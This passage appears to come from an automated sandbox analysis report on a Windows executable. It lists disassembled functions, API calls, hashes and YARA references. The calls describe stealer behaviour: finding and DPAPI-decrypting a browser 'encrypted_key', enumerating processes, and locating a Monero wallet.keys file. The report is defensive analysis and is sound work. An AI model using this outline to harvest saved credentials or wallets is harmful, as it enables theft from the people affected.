                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: 4ab20a381f2e255d8a1b8fcf552e5d20e007fe3511352cd1db8e66a2ffdb7c2b
                          • Instruction ID: aadc2ebd4ddf12cfb04e2c2f4f233bf734449d0873b802f11da9c780ad8921d9
                          • Opcode Fuzzy Hash: 4ab20a381f2e255d8a1b8fcf552e5d20e007fe3511352cd1db8e66a2ffdb7c2b
                          • Instruction Fuzzy Hash: FF4181B1D10108EFCB04EFE5D945AEEB7B4AF54704F10801EE41676291DB789A46CFAA
                          Function 00409CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                            • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                            • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                            • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,0040148F,00000000), ref: 00409A5A
                            • Part of subcall function 004099C0: LocalFree.KERNEL32(0040148F), ref: 00409A90
                            • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                            • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                            • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                            • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                            • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                            • Part of subcall function 00409B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B84
                            • Part of subcall function 00409B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00409BA3
                            • Part of subcall function 00409B60: LocalFree.KERNEL32(?), ref: 00409BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 4a62dc9678bbcd1cabf209cd892d7595286da244c6d51c9b067c14af0d769b98
                          • Instruction ID: 51515721a1a3ec885207932c39a0a70c56b110abb63bb806a73a598b0ac1e228
                          • Opcode Fuzzy Hash: 4a62dc9678bbcd1cabf209cd892d7595286da244c6d51c9b067c14af0d769b98
                          • Instruction Fuzzy Hash: D33152B5D10109ABCB04EBE4DC85AEF77B8AF48304F14452AE915B7282E7389E04CBA5
                          Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(00420E17,00000000), ref: 0041A788
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                          • Process32First.KERNEL32(?,00000128), ref: 004186DE
                          • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                            • Part of subcall function 0041A9B0: lstrlen.KERNEL32(?,01288AF0,?,\Monero\wallet.keys,00420E17), ref: 0041A9C5
                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                            • Part of subcall function 0041A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0041AA12
                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,00420E17), ref: 0041A905
                          • CloseHandle.KERNEL32(?), ref: 00418761
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                          • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                          • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                          • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                          Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004179B7
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                          • wsprintfA.USER32 ref: 004179F3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                          • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                          • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                          • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                          Function 0041C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __getptd.LIBCMT ref: 0041C74E
                            • Part of subcall function 0041BF9F: __amsg_exit.LIBCMT ref: 0041BFAF
                          • __getptd.LIBCMT ref: 0041C765
                          • __amsg_exit.LIBCMT ref: 0041C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0041C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 0dee89ca1e27279cee20c61cf39372be64ae68290e804cf05a8e7f65ce69890f
                          • Instruction ID: f221cbc75ab16e387751c9b116ef15a62a105912f32ca5c84f33c5bc9026f8a6
                          • Opcode Fuzzy Hash: 0dee89ca1e27279cee20c61cf39372be64ae68290e804cf05a8e7f65ce69890f
                          • Instruction Fuzzy Hash: 72F09632A817119BD7207BB95C467DE33A09F00728F24414FF414A62D2CBAC59D29E9E
                          Function 00414F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00418E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00414F7A
                          • lstrcat.KERNEL32(?,00421070), ref: 00414F97
                          • lstrcat.KERNEL32(?,01288BA0), ref: 00414FAB
                          • lstrcat.KERNEL32(?,00421074), ref: 00414FBD
                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                            • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                            • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                            • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                            • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.2130713329.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2130491210.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2130713329.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.000000000065E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000007E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.00000000008F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132018238.0000000000907000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2132637821.0000000000908000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133009545.0000000000AA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2133499270.0000000000AAA000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                          • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                          • Opcode Fuzzy Hash: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
                          • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96